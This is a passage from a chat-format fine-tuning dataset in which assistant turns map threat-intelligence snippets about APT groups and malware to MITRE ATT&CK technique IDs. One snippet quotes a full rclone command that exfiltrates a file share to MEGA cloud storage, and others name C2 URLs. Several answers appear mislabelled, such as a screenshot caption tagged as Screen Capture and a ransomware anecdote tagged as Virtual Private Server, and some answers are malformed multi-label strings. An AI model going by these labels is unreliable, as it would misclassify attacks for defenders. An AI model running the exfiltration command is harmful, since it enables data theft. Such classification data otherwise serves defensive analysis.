description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CostaBricks has been used to load SombRAT onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has masqueraded as legitimate Adobe Content Management System files." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has established GitHub accounts to host their malware." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "queries the Registry for specific keys for potential privilege escalation and proxy information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.  The following commands were observed: tasklist ipconfig /all The attacker performed these two commands 33 seconds apart" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download and execute a second-stage payload." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a PowerShell script to launch shellcode that retrieves an additional payload." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can enumerate the OS version and hostname of a targeted machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos can modify timestamps of replaced files, such as \"ssh\" with the added credential stealer or \"sshd\" used to deploy Kobalos." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pisloader has a command to upload a file to the victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "messengers. Figures 9 and 10 show FakeM attempting to resemble MSN or Yahoo. Messenger traffic, as the first 32-bytes contain data that resemble legitimate traffic generated by these chat programs" }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "delivered to victims via a compromised legitimate website." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Green Lambert can collect the date and time from a compromised host." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can use a Base64-encoded AES key to decrypt tasking." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing has used chmod to modify permissions on key files for use." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "tries to add a Registry Run key under the name \"Windows Update\" to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Payloads The delivery documents in this attack campaign loaded remote templates whose macros installed a variety of first-stage payloads" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can launch cmd.exe to perform reconnaissance commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It appears Russian cyber criminals were equally perplexed by the WCry campaign as the rest of the world. One of the members of the popular underground community complained about the recently purchased Virtual Private Server (VPS) which was almost immediately infected by ransomware even before the system update was completed." }, { "role": "assistant", "content": "T1584.003 - Virtual Private Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT18 uses DNS for C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code." }, { "role": "assistant", "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has modified ComSysApp service to load the malicious DLL payload." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar has encrypted data before sending it to the server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used VBS code on victims’ systems." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can collect information from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XTunnel uses SSL/TLS and RC4 to encrypt traffic." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses credential dumpers such as and to extract cached credentials from Windows systems." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer can enumerate remote computers in the compromised network." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC." }, { "role": "assistant", "content": "T1207 - Rogue Domain Controller" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement." }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can list the running processes and get the process ID and parent process’s ID." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and module arqueiro.  The downloaded modules found in regsvr32.exe as detected by the Cybereason platform" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can compress and archive collected files using WinRAR." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used Mimikatz to generate Kerberos golden tickets." }, { "role": "assistant", "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may collect process information by running \"tasklist\" on a victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Hunting for PDF files that are created with the same “DocumentID” management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nidiran can download and execute files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a keylogger to capture keystrokes." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used valid credentials with various services during lateral movement." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands with script as well as execute JavaScript." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing has used valid SSH credentials to access remote hosts." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used spearphishing with an attachment to deliver files with exploits to initial victims." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp://zeplin.atwebpages.com/inter.php and exfiltrates the ipconfig output gathered from the machine" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By default, Excel does not allow the download of data from the remote server, but will ask for the user’s consent by presenting the dialog box in Figure 2: Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE creates a scheduled task to run itself every three minutes." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elise creates a file in \"AppData\\Local\\Microsoft\\Windows\\Explorer\" and stores all harvested data in that file." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS." }, { "role": "assistant", "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp uses Perl scripts." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group’s modus operandi" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete uses FTP for Command & Control." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used tools for capturing keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) To register a new infected system the malware perform a POST request to /api/white_walkers/new with data on the compromised system consisting of" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster." }, { "role": "assistant", "content": "T1609 - Kubernetes Exec Into Container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: Screen capture of the downloader executed on OS X El Capitan" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used a PowerShell-based keylogger named `kl.ps1`." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has been known to pack their tools." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to dump credentials any time a domain, local user, or administrator logs in or changes a password." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has changed the time stamp of certain files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, 